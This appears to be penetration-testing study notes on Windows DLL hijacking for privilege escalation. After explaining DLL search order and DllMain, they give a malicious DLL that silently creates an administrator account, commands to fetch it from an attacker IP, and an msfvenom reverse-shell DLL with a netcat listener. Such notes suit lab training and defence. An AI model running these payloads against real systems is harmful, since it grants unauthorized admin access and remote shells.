6. DLL Hijacking

Dynamic Link Libraries (DLLs) provide functionality to programs or the OS.
They are a way for developers to use and integrate already existing functionality without reinventing the wheel.
On Unix they are comparable to Shared Objects.
DLLs can be abused in multiple ways for privilege escalation.
- One way is to replace the .DLL in the same way as for service hijacking.
- Another method is called "DLL Search Order"

DLL Search Order:

The search order determines the order of DLLs to inspecting when searching for them. By default Safe DLL Search Mode is enabled, which makes it more difficult.
Microsoft's standard search order:

1. The directory from which the application loaded.
2. The system directory.
3. The 16-bit system directory.
4. The Windows directory. 
5. The current directory.
6. The directories that are listed in the PATH environment variable.

When safe mode is disabled the current directory is at position 2 after application's directory.
List search order using:

$env:path

One-liner to list all paths and the permissions for them (GPT):

$env:path -split ";" | ForEach-Object { "$_"; (icacls.exe $_) | Select-String -Pattern ":\s*\([^)]+\)" }

Inner workings of DLLs:

Each DLL can have an optional entry point funtion named "DllMain", which is executed when processes or threads attach the DLL.
DllMain generally contains four cases named:
- DLL_PROCESS_ATTACH
- DLL_THREAD_ATTACH
- DLL_THREAD_DETACH
- DLL_PROCESS_DETACH
The four cases handle situations where the DLL is loaded or unloaded by a process or thread.
They are commonly used to perform starting or quitting tasks.
If the DLL does not include DllMain it only provides resources.
Example of a basic DLL in C++ containing these cases:

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

DLL Search Order Hijacking:

Start procmon or other to review services and their DLLs. (Procmon has to be run as administrator on the target machine, otherwise the binary has to be copied and analysed locally)
Find a DLL which is missing.
Create a DLL in the form of a '.cpp'-file on your Kali. Example of new admin user:

#include <stdlib.h>
#include <windows.h>

BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user zombie password123! /add");
  	    i = system ("net localgroup administrators zombie /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}

Cross-compile the DLL with mingw:

x86_64-w64-mingw32-gcc <dllname>.cpp --shared -o <dllname>.dll

Serve the DLL and download it.

iwr -uri http://192.168.119.3/myDLL.dll -Outfile myDLL.dll

Move the DLL to the optimal position in the search order path using 'move'.
Restart the service loading the DLL:

Restart-Service <servicename>

Win!

DLL Reverse Shell with MSF:

sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.226 LPORT=443 -a x64 --platform Windows -f dll -o EnterpriseServiceOptional.dll

nc -lvnp 443

iwr -uri http://192.168.45.226:8001/EnterpriseServiceOptional.dll -Outfile EnterpriseServiceOptional.dll

RestartService EnterpriseService